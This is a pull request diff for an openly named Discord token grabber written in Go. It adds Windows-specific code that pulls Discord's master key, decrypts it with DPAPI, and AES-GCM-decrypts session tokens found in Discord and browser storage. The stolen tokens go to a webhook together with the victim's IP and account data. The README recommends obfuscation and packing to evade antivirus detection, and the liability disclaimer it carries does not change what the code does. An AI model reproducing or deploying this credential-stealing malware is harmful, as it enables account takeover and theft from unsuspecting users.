### PR TITLE
Bypass Discord Encryption Windows

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,19 +1,8 @@
-# ⚠ Currently Being Updated for Windows ! Next Release: 10/06/2022
-
 # Discord Token Grabber Written in Go !
 
-### Liability Disclaimer ⚠
-
-The use of this software on any device that is not your own is highly discouraged. 
-You need to obtain explicit permission from the owner if you intend to use this program in an environment you don't own, 
-any illicit installation will likely be prosecuted by the jurisdiction the (ab)use occurs in.
-
-Creators shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits
-or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses,
-resulting from:
-- (i) your access to this resource and/or inability to access this resource
-- (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties
-- (iii) any content obtained from this resource
+*Since the new Discord Update, discord encrypts the token on Windows using WinApi specific functions and AES GCM.
+It means that the token grabber is now platform dependant. The code on this current branch is designed for Windows Systems. 
+If you wish to use it for Linux & MacOS, please checkout the [Unix](https://github.com/faceslog/discord-grabber-go/tree/unix) branch*
 
 ### Features: ⚙
 
@@ -40,21 +29,33 @@ const (
 )
 ```
 
-Then simply compile the `main.go` file !
+Then simply compile the `main.go win.go` files !
 ```sh
 # This command will keep debug info in your exe, and it will be detected by AVs 
 # You can avoid this by using specific config flags that I won't provide here ! 
 # with the correct config flags + some obfuscation the score on Virus Total is 0 
-go build main.go
+go build main.go win.go
 # By default, go build combines symbol and debug info with binary files. 
 # However, you can remove the symbol and debug info with 
-go build -ldflags "-s -w"
+go build -ldflags "-s -w" main.go win.go
 ```
 You should probably obfuscate or pack the executable file to avoid being detected by AVs. 
-You can check out: https://github.com/burrowers/garble
+You can check out: https://github.com/burrowers/garble or https://upx.github.io/
 
 ### Contributing
 
-Since it was my first go program there are things that can be improved for sure, don't hesitate to let me know 
+Since it was one of my first go program there are things that can be improved for sure, don't hesitate to let me know.
 
+### Liability Disclaimer ⚠
+
+The use of this software on any device that is not your own is highly discouraged.
+You need to obtain explicit permission from the owner if you intend to use this program in an environment you don't own,
+any illicit installation will likely be prosecuted by the jurisdiction the (ab)use occurs in.
+
+Creators shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits
+or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses,
+resulting from:
+- (i) your access to this resource and/or inability to access this resource
+- (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties
+- (iii) any content obtained from this resource
 

--- a/go.mod
+++ b/go.mod
@@ -1,3 +1,7 @@
 module discord-grabber-go
 
 go 1.17
+
+require (
+	golang.org/x/sys v0.0.0-20220608164250-635b8c9b7f68
+)

--- a/go.sum
+++ b/go.sum
@@ -1,0 +1,2 @@
+golang.org/x/sys v0.0.0-20220608164250-635b8c9b7f68 h1:z8Hj/bl9cOV2grsOpEaQFUaly0JWN3i97mo3jXKJNp0=
+golang.org/x/sys v0.0.0-20220608164250-635b8c9b7f68/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=

--- a/main.go
+++ b/main.go
@@ -2,6 +2,9 @@ package main
 
 import (
 	"bytes"
+	"crypto/aes"
+	"crypto/cipher"
+	"encoding/base64"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -17,51 +20,21 @@ import (
 
 const (
 	WebhookUrl       = "YOUR_WEBHOOK_URL"
-	WebhookAvatarUrl = "YOUR_WEBHOOK_IMG (ex: https://imgur.com/a/xxxxx)"
+	WebhookAvatarUrl = "YOUR_WEBHOOK_IMG"
 	WebhookUsername  = "YOUR_WEBHOOK_NAME"
 	DiscordApiUsers  = "https://discord.com/api/v9/users/@me"
 	DiscordApiNitro  = "https://discord.com/api/v9/users/@me/billing/subscriptions"
 	DiscordImgUrl    = "https://cdn.discordapp.com/avatars/"
-	IpAddrGet        = "http://ipinfo.io/ip"
+	IpAddrGet        = "https://ipinfo.io/ip"
 	Debug            = false
 )
 
-var tokenRe = regexp.MustCompile("[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}")
-
-func getPathWindows() (paths map[string]string) {
-	local := os.Getenv("LOCALAPPDATA")
-	roaming := os.Getenv("APPDATA")
-
-	paths = map[string]string{
-		"Lightcord":      roaming + "/Lightcord",
-		"Discord":        roaming + "/Discord",
-		"Discord Canary": roaming + "/discordcanary",
-		"Discord PTB":    roaming + "/discordptb",
-		"Google Chrome":  local + "/Google/Chrome/User Data/Default",
-		"Opera":          roaming + "/Opera Software/Opera Stable",
-		"Brave":          local + "/BraveSoftware/Brave-Browser/User Data/Default",
-		"Yandex":         local + "/Yandex/YandexBrowser/User Data/Default",
-	}
-
-	return
+type JsonKeyFile struct {
+	Crypt OSCrypt `json:"os_crypt"`
 }
 
-func getPathLinuxAndMac() (paths map[string]string) {
-	homedir, _ := os.UserHomeDir()
-
-	paths = map[string]string{
-		"Discord":        homedir + "/.config/discord",
-		"Discord Canary": homedir + "/.config/discordcanary",
-		"Discord PTB":    homedir + "/.config/discordptb",
-		"Google Chrome":  homedir + "/.config/google-chrome/Default",
-		"Opera":          homedir + "/.config/opera",
-		"Brave":          homedir + "/.config/BraveSoftware",
-		"Yandex Beta":    homedir + "/.config/yandex-browser-beta/Default",
-		"Yandex":         homedir + "/.config/yandex-browser/Default",
-		"Discord Mac":    homedir + "/Library/Application Support/discord/Local Storage/leveldb",
-	}
-
-	return
+type OSCrypt struct {
+	EncryptedKey string `json:"encrypted_key"`
 }
 
 func doesItemExists(arr []string, item string) bool {
@@ -142,36 +115,101 @@ func isTokenValid(token string, tokenList []string) bool {
 	return true
 }
 
-func findTokens(path string) (tokenList []string) {
+func getMasterKey() ([]byte, error) {
+
+	jsonFile := os.Getenv("APPDATA") + "/discord/Local State"
+
+	byteValue, err := ioutil.ReadFile(jsonFile)
+	if err != nil {
+		return nil, fmt.Errorf("could not read json file")
+	}
+
+	var fileData JsonKeyFile
+	err = json.Unmarshal(byteValue, &fileData)
+	if err != nil {
+		return nil, fmt.Errorf("could not parse json")
+	}
+
+	baseEncryptedKey := fileData.Crypt.EncryptedKey
+	encryptedKey, e := base64.StdEncoding.DecodeString(baseEncryptedKey)
+	if e != nil {
+		return nil, fmt.Errorf("could not decode base64")
+	}
+	encryptedKey = encryptedKey[5:]
+
+	key, err := Decrypt(encryptedKey)
+	if err != nil {
+		return nil, fmt.Errorf("cryptunprotectdata decryption Failed ")
+	}
+
+	return key, nil
+}
+
+func decryptToken(buffer []byte) (string, error) {
 
 	if Debug {
-		fmt.Printf("Searching for tokens !\n")
+		fmt.Println("Decrypting Token")
 	}
 
-	path += "/Local Storage/leveldb/"
-	files, _ := ioutil.ReadDir(path)
+	iv := buffer[3:15]
+	payload := buffer[15:]
 
-	for _, file := range files {
-		name := file.Name()
-		if strings.HasSuffix(name, ".log") || strings.HasSuffix(name, ".ldb") {
+	key, err := getMasterKey()
+	if err != nil {
+		return "", err
+	}
 
-			content, _ := ioutil.ReadFile(path + "/" + name)
-			lines := bytes.Split(content, []byte("\\n"))
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return "", err
+	}
 
-			for _, line := range lines {
-				for _, match := range tokenRe.FindAll(line, -1) {
+	aesGCM, err := cipher.NewGCM(block)
+	if err != nil {
+		return "", err
+	}
 
-					token := string(match)
+	ivSize := len(iv)
+	if len(payload) < ivSize {
+		return "", fmt.Errorf("incorrect iv, iv is too big")
+	}
 
-					if isTokenValid(token, tokenList) {
-						tokenList = append(tokenList, token)
-					}
-				}
-			}
+	plaintext, err := aesGCM.Open(nil, iv, payload, nil)
+	if err != nil {
+		return "", err
+	}
+
+	return string(plaintext), nil
+}
+
+func searchEncryptedToken(line []byte, tokenList *[]string) {
+
+	var tokenRegex = regexp.MustCompile("dQw4w9WgXcQ:[^\"]*")
+
+	for _, match := range tokenRegex.FindAll(line, -1) {
+
+		baseToken := strings.SplitAfterN(string(match), "dQw4w9WgXcQ:", 2)[1]
+		encryptedToken, _ := base64.StdEncoding.DecodeString(baseToken)
+		token, _ := decryptToken(encryptedToken)
+
+		if isTokenValid(token, *tokenList) {
+			*tokenList = append(*tokenList, token)
 		}
 	}
+}
 
-	return
+func searchDecryptedToken(line []byte, tokenList *[]string) {
+
+	var tokenRegex = regexp.MustCompile("[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}")
+
+	for _, match := range tokenRegex.FindAll(line, -1) {
+
+		token := string(match)
+
+		if isTokenValid(token, *tokenList) {
+			*tokenList = append(*tokenList, token)
+		}
+	}
 }
 
 func getJsonValue(key string, jsonData string) (value string) {
@@ -272,18 +310,58 @@ func sendEmbed(token string) {
 	defer response.Body.Close()
 }
 
-func getAllTokens(paths map[string]string) {
+func getAllTokens() {
 
-	for _, path := range paths {
+	var paths map[string]string
+	var tokenList []string
+
+	local := os.Getenv("LOCALAPPDATA")
+	roaming := os.Getenv("APPDATA")
+
+	paths = map[string]string{
+		"Lightcord":      roaming + "/Lightcord",
+		"Discord":        roaming + "/Discord",
+		"Discord Canary": roaming + "/discordcanary",
+		"Discord PTB":    roaming + "/discordptb",
+		"Google Chrome":  local + "/Google/Chrome/User Data/Default",
+		"Opera":          roaming + "/Opera Software/Opera Stable",
+		"Opera GX":       roaming + "/Opera Software/Opera GX Stable",
+		"Brave":          local + "/BraveSoftware/Brave-Browser/User Data/Default",
+		"Yandex":         local + "/Yandex/YandexBrowser/User Data/Default",
+	}
+
+	for pathName, path := range paths {
 
 		if _, err := os.Stat(path); os.IsNotExist(err) {
 			continue
 		}
 
-		tokenList := findTokens(path)
-		for _, token := range tokenList {
-			sendEmbed(token)
+		path += "/Local Storage/leveldb/"
+		files, _ := ioutil.ReadDir(path)
+
+		for _, file := range files {
+			name := file.Name()
+
+			if !strings.HasSuffix(name, ".log") && !strings.HasSuffix(name, ".ldb") {
+				continue
+			}
+
+			content, _ := ioutil.ReadFile(path + "/" + name)
+			lines := bytes.Split(content, []byte("\\n"))
+
+			for _, line := range lines {
+
+				if pathName == "Discord" {
+					searchEncryptedToken(line, &tokenList)
+				} else {
+					searchDecryptedToken(line, &tokenList)
+				}
+			}
 		}
+	}
+
+	for _, token := range tokenList {
+		sendEmbed(token)
 	}
 }
 
@@ -293,18 +371,5 @@ func main() {
 		fmt.Println("Running grabber in Debug Mode ...")
 	}
 
-	goos := runtime.GOOS
-
-	switch goos {
-	case "windows":
-		getAllTokens(getPathWindows())
-	case "linux":
-		getAllTokens(getPathLinuxAndMac())
-	case "darwin":
-		getAllTokens(getPathLinuxAndMac())
-	default:
-		if Debug {
-			fmt.Printf("%s.\n", goos)
-		}
-	}
+	getAllTokens()
 }

--- a/win.go
+++ b/win.go
@@ -1,0 +1,35 @@
+// Thanks to https://stackoverflow.com/questions/33516053/windows-encrypted-rdp-passwords-in-golang
+package main
+
+import (
+	"fmt"
+	"unsafe"
+
+	"golang.org/x/sys/windows"
+)
+
+func bytesToBlob(bytes []byte) *windows.DataBlob {
+	blob := &windows.DataBlob{Size: uint32(len(bytes))}
+	if len(bytes) > 0 {
+		blob.Data = &bytes[0]
+	}
+	return blob
+}
+
+func Decrypt(data []byte) ([]byte, error) {
+
+	out := windows.DataBlob{}
+	var outName *uint16
+
+	err := windows.CryptUnprotectData(bytesToBlob(data), &outName, nil, 0, nil, 0, &out)
+	if err != nil {
+		return nil, fmt.Errorf("unable to decrypt DPAPI protected data: %w", err)
+	}
+	ret := make([]byte, out.Size)
+	copy(ret, unsafe.Slice(out.Data, out.Size))
+
+	windows.LocalFree(windows.Handle(unsafe.Pointer(out.Data)))
+	windows.LocalFree(windows.Handle(unsafe.Pointer(outName)))
+
+	return ret, nil
+}


### PR DESCRIPTION
Since the new Discord Update, discord encrypts the token on Windows using WinApi specific functions and AES GCM. It means that the token grabber is now platform dependant. The code on this current branch is designed for Windows Systems. If you wish to use it for Linux & MacOS, please checkout the [Unix](https://github.com/faceslog/discord-grabber-go/tree/unix) branch